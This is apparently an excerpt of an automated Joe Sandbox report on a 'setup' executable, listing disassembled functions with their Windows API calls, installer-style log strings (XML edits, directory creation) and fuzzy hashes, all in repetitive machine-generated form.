                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThreadValue$AllocDuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3981808159-0
                                                                                                                          • Opcode ID: 7f356033f6f2fce2d3ac163c0f3b165216d3374e9d897141dec8bfe82e994687
                                                                                                                          • Instruction ID: a8f13bcd316c3dcf29a683db0777e08239fa91ddc6ea776a973c88121fd9bbde
                                                                                                                          • Opcode Fuzzy Hash: 7f356033f6f2fce2d3ac163c0f3b165216d3374e9d897141dec8bfe82e994687
                                                                                                                          • Instruction Fuzzy Hash: E7F082B17002407BEB102BF0BCCEF2E3B68EB85742F04403AF645D61E1DA76D8119724
                                                                                                                          Function 00C39A41 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 271COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C39AE8
                                                                                                                          • CoCreateGuid.OLE32(?,00000034), ref: 00C39B3D
                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00C39D27
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFreeGuidH_prolog3_String
                                                                                                                          • String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$RestartByRestartManager
                                                                                                                          • API String ID: 1084067465-5890034
                                                                                                                          • Opcode ID: 74a80403c8e6192f09aac473dfa928f45963ef5c1bc9550f2c05dbf6660b6105
                                                                                                                          • Instruction ID: 41f91f2a415de669409a25da3469d7e4fb25e582025e119996ae5aab83fdd239
                                                                                                                          • Opcode Fuzzy Hash: 74a80403c8e6192f09aac473dfa928f45963ef5c1bc9550f2c05dbf6660b6105
                                                                                                                          • Instruction Fuzzy Hash: C1A1C271A00119AFCF05EBA4D898AFEBBB9EF48314F184069F541B7291DF749E05EB60
                                                                                                                          Function 00C31487 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 215windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C3E462: __EH_prolog3.LIBCMT ref: 00C3E47F
                                                                                                                          • SendMessageW.USER32(?,00000433,00000000,?), ref: 00C3165F
                                                                                                                          • GetWindowLongW.USER32(?,000000FC), ref: 00C3166A
                                                                                                                          • GetWindowLongW.USER32(?,000000FC), ref: 00C3167E
                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00000000), ref: 00C316A7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongWindow$H_prolog3MessageSend
                                                                                                                          • String ID: ,
                                                                                                                          • API String ID: 4140968126-3772416878
                                                                                                                          • Opcode ID: 61db298d15c6f00e69cb9433c65cb0255787dde5c494dfba64b7d4557f0bc85e
                                                                                                                          • Instruction ID: 8125dcdc0e42bb641e4ec2b0f44e0875504d96fec07d715f3790d194c47700ad
                                                                                                                          • Opcode Fuzzy Hash: 61db298d15c6f00e69cb9433c65cb0255787dde5c494dfba64b7d4557f0bc85e
                                                                                                                          • Instruction Fuzzy Hash: DB71C131B10615EFCF15AFA4D899A6DB7B5FF48350F08016AED5297292DB70EE00DBA0
                                                                                                                          Function 00C355FD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 198comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C35607
                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00C35683
                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 00C35813
                                                                                                                          • CoCreateInstance.OLE32(00C9C2E0,00000000,00000001,00C99F88,?), ref: 00C3585A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateH_prolog3_InitializeInstanceVersion
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 1117250964-2766056989
                                                                                                                          • Opcode ID: 39aadca7994a2d51462c725f0158ac383748a224922d041db632e07699539230
                                                                                                                          • Instruction ID: ae32aa416c62f974f91ce9c9ea8836a87457438235c8a52a0a6ce9d448c2ed1c
                                                                                                                          • Opcode Fuzzy Hash: 39aadca7994a2d51462c725f0158ac383748a224922d041db632e07699539230
                                                                                                                          • Instruction Fuzzy Hash: 578159B0B11B16AFDB58DF28C885BD9B7E8FF09310F00425AE958D7291DB30A955CFA1
                                                                                                                          Function 00C3BC5D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000000), ref: 00C3BC98
                                                                                                                          • PathFindExtensionW.SHLWAPI(?,?,00000000), ref: 00C3BCB2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExtensionFileFindModuleNamePath
                                                                                                                          • String ID: .CHM$.HLP$.INI
                                                                                                                          • API String ID: 2295281026-4017452060
                                                                                                                          • Opcode ID: 7cf0d02e93ba0bb7a2f65dd0307871a1da5a878c85125c5bb70820f64a23de84
                                                                                                                          • Instruction ID: c8ab6b8e85370af843932f7f44455d1db6391aebe42e57914edf21e9c752ee45
                                                                                                                          • Opcode Fuzzy Hash: 7cf0d02e93ba0bb7a2f65dd0307871a1da5a878c85125c5bb70820f64a23de84
                                                                                                                          • Instruction Fuzzy Hash: E841A0B19107099BDB20EB74DD49BAAB3FCAF54310F04486AA656C7681EF70DE44CB61
                                                                                                                          Function 00C1836F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • Failed to update xml file..., xrefs: 00C184C7
                                                                                                                          • Inserting XML : "%s" ---> "%s", xrefs: 00C1846F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen$H_prolog3_
                                                                                                                          • String ID: Failed to update xml file...$Inserting XML : "%s" ---> "%s"
                                                                                                                          • API String ID: 2786647812-2790445707
                                                                                                                          • Opcode ID: c1078bd366826bd0c3d9b4fd35763802a4d9a16a6fc25c0190facf2a8997f5d4
                                                                                                                          • Instruction ID: 116dddaa639c4f3ad8d89db1215e04602d8392770b4cb474934d8c762cbbbdee
                                                                                                                          • Opcode Fuzzy Hash: c1078bd366826bd0c3d9b4fd35763802a4d9a16a6fc25c0190facf2a8997f5d4
                                                                                                                          • Instruction Fuzzy Hash: 69517E71D00258EFDB10EFA9D8959DEB7B8FF15700F508129F425AB1A1DF709A48EB90
                                                                                                                          Function 00C181F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • Removing XML Node: "%s" from "%s", xrefs: 00C182EA
                                                                                                                          • Removing XML Node: Failed or not found., xrefs: 00C1831E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen$H_prolog3_
                                                                                                                          • String ID: Removing XML Node: "%s" from "%s"$Removing XML Node: Failed or not found.
                                                                                                                          • API String ID: 2786647812-415792819
                                                                                                                          • Opcode ID: 7f8d678c60abbd9b8b7e4140f9fc2d88e04e3b3f2e6cf112d3a45733bcef8786
                                                                                                                          • Instruction ID: 334f7c307b3f7a8c0d5b2964cbf342b86b0350a7c605b5faf262b93e3cdab946
                                                                                                                          • Opcode Fuzzy Hash: 7f8d678c60abbd9b8b7e4140f9fc2d88e04e3b3f2e6cf112d3a45733bcef8786
                                                                                                                          • Instruction Fuzzy Hash: 5C418A71E00258EBDB10EFA9C8969DEB7B8FF19700F544129F511BB091DB709E49EBA0
                                                                                                                          Function 00C6FAE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00C6FB17
                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00C6FB1F
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00C6FBA8
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00C6FC28
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CookiesLocalValidate$___except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 2101322661-1018135373
                                                                                                                          • Opcode ID: b21d2f004dab6e880cd184c74f87f4ae24b1c53d2df3b6431ed75d364b040ca7
                                                                                                                          • Instruction ID: 414b8e7afcf30900ce94b3ddb4b404646b082bf8fe70458e8ac7e38dc99c61f1
                                                                                                                          • Opcode Fuzzy Hash: b21d2f004dab6e880cd184c74f87f4ae24b1c53d2df3b6431ed75d364b040ca7
                                                                                                                          • Instruction Fuzzy Hash: B441BA34A00209DBCF20DF69D894A9E7BB5FF45314F24C169E8289B352D731DA06DB90
                                                                                                                          Function 00C1C53F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110sleepsynchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1C546
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000074,00C1C348), ref: 00C1C582
                                                                                                                          • Sleep.KERNEL32(000003E8,00000074,00C1C348), ref: 00C1C58D
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00CAE150,?,00000005), ref: 00C1C669
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteH_prolog3_ObjectShellSingleSleepWait
                                                                                                                          • String ID: open
                                                                                                                          • API String ID: 213813978-2758837156
                                                                                                                          • Opcode ID: 7d9c638a7b0ed1d5885ff968c96ad8e94df96b0dae03cddba9a03c6bee785c6b
                                                                                                                          • Instruction ID: 5cb687c07f1830bbba26118abd841165d8977439592076c8a5ab821db7ac6d03
                                                                                                                          • Opcode Fuzzy Hash: 7d9c638a7b0ed1d5885ff968c96ad8e94df96b0dae03cddba9a03c6bee785c6b
                                                                                                                          • Instruction Fuzzy Hash: 3041A2B2A40215EBDF14EF94CC89BED7779EF45710F184169F515BB182DB30AA80DBA0
                                                                                                                          Function 00C1E53D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • KillTimer.USER32(?,00000064), ref: 00C1E54F
                                                                                                                          • SetTimer.USER32(?,000000C8,000000FA,00000000), ref: 00C1E565
                                                                                                                          • KillTimer.USER32(?,00000096), ref: 00C1E5B6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Timer$Kill
                                                                                                                          • String ID: d
                                                                                                                          • API String ID: 3307318486-2564639436
                                                                                                                          • Opcode ID: d58243dce96201d29339313fca6e860ab6f466a0676300ebfa63605029ad137c
                                                                                                                          • Instruction ID: 12966cfe71365ede801366c0e96162aa57e6adb96dcd4260e1ac7541d575567c
                                                                                                                          • Opcode Fuzzy Hash: d58243dce96201d29339313fca6e860ab6f466a0676300ebfa63605029ad137c
                                                                                                                          • Instruction Fuzzy Hash: 2821A730240705DBD6355B21CC15FEB7AA6FB92B00F40452DF8AA861A0EF716990EF41
                                                                                                                          Function 00C1810C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C18113
                                                                                                                          • _strlen.LIBCMT ref: 00C18137
                                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000,00000020,00C1716A,?), ref: 00C1817E
                                                                                                                          Strings
                                                                                                                          • Creating directory : "%s", xrefs: 00C1819B
                                                                                                                          • Failed to create directory..., xrefs: 00C181BF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFileH_prolog3__strlen
                                                                                                                          • String ID: Creating directory : "%s"$Failed to create directory...
                                                                                                                          • API String ID: 3880062980-575565180
                                                                                                                          • Opcode ID: 4bffaecd59604d7e8c313b60a9413a5b61e161c13f2f54002ae82eaffccbdeb2
                                                                                                                          • Instruction ID: c05a49a4b63a3ca97b26d8b2ff23e2c0fa06f6248ff1df7f341e2dc3ad814cd5
                                                                                                                          • Opcode Fuzzy Hash: 4bffaecd59604d7e8c313b60a9413a5b61e161c13f2f54002ae82eaffccbdeb2
                                                                                                                          • Instruction Fuzzy Hash: 81218072A04208ABCF00EE99D8858DE7778EF59710F244525F811B7091DB309F8AEBA0
                                                                                                                          Function 00C13DF1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSysColor.USER32(00000008), ref: 00C13DFD
                                                                                                                          • GetSysColor.USER32(00000005), ref: 00C13E03
                                                                                                                          • GetSysColor.USER32(0000000E), ref: 00C13E0A
                                                                                                                          • GetSysColor.USER32(0000000D), ref: 00C13E11
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color
                                                                                                                          • String ID: /
                                                                                                                          • API String ID: 2811717613-2340523434
                                                                                                                          • Opcode ID: 899cba7ca82259a9081018fef4cee206148449220995cd15d6e45e93177d68d8
                                                                                                                          • Instruction ID: 85a73d4a86f0ef19dd5487c238eb377a33c6d1a337957c730436d1f73f461c84
                                                                                                                          • Opcode Fuzzy Hash: 899cba7ca82259a9081018fef4cee206148449220995cd15d6e45e93177d68d8
                                                                                                                          • Instruction Fuzzy Hash: 19319EB1A15B56AEC3589F2AD549781FFE0FF08318F10822ED1688BB51C7B0A068DFC4
                                                                                                                          Function 00C38AF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Edit
                                                                                                                          • API String ID: 0-554135844
                                                                                                                          • Opcode ID: 677bd6b645b01ef0b4c5f7641102042e9749e6a35152527002eee453b3cd3c5b
                                                                                                                          • Instruction ID: d6291ecc07707ff11e39303f4c773acf0df414a3fc0a14d15e2843139f02063d
                                                                                                                          • Opcode Fuzzy Hash: 677bd6b645b01ef0b4c5f7641102042e9749e6a35152527002eee453b3cd3c5b
                                                                                                                          • Instruction Fuzzy Hash: 7511C471360303ABEE301B35CC09F7AF6A8AF40769F184535F562921E1DF71D948D650
                                                                                                                          Function 00C4235A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll,4641B5ED,?,?,?,00C928E2,000000FF), ref: 00C423A1
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C423B1
                                                                                                                            • Part of subcall function 00C3B452: GetModuleHandleW.KERNEL32(Advapi32.dll,?), ref: 00C3B465
                                                                                                                            • Part of subcall function 00C3B452: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00C3B475
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: Advapi32.dll$RegDeleteKeyExW
                                                                                                                          • API String ID: 1646373207-2191092095
                                                                                                                          • Opcode ID: 7c262e309eb993204fedfbb4ad47ca42702990265b995a4be5031cc5713307dd
                                                                                                                          • Instruction ID: 966cde204b99958a99e7f69d037f2029466a40a87f4ba9b3e6907373c3026a88
                                                                                                                          • Opcode Fuzzy Hash: 7c262e309eb993204fedfbb4ad47ca42702990265b995a4be5031cc5713307dd
                                                                                                                          • Instruction Fuzzy Hash: AD11C176504144EFCB119F15EC09F9DBFB8FB08B50F10822AF916A32B0CB799900EB54
                                                                                                                          Function 00C1988C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
